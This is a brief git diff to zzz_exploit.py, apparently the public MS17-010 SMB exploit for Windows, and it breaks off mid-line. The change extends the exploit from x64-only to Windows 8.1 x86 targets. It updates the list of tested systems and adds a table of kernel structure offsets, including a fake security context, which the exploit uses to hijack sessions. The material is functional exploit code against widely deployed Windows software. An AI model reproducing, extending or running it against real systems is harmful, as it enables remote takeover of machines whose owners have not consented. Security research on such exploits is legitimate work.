diff --git a/zzz_exploit.py b/zzz_exploit.py index a92e1a9..bf067c7 100644 --- a/zzz_exploit.py +++ b/zzz_exploit.py @@ -7,11 +7,10 @@ import socket import time ''' -MS17-010 exploit for Windows 7+ x64 by sleepya +MS17-010 exploit for Windows 7+ by sleepya Note: - The exploit should never crash a target (chance should be nearly 0%) -- The exploit support only x64 target - The exploit use the bug same as eternalromance and eternalsynergy, so named pipe is needed Tested on: @@ -20,6 +19,7 @@ Tested on: - Windows 8.1 x64 - Windows 2008 R2 SP1 x64 - Windows 7 SP1 x64 +- Windows 8.1 x86 - Windows 7 SP1 x86 ''' @@ -88,6 +88,13 @@ WIN8_INFO = { 'SECCTX_SIZE': 0x38, } +WIN8_32_INFO = { + 'SESSION_SECCTX_OFFSET': 0x88, + 'SESSION_ISNULL_OFFSET': 0x9e, + 'FAKE_SECCTX': pack('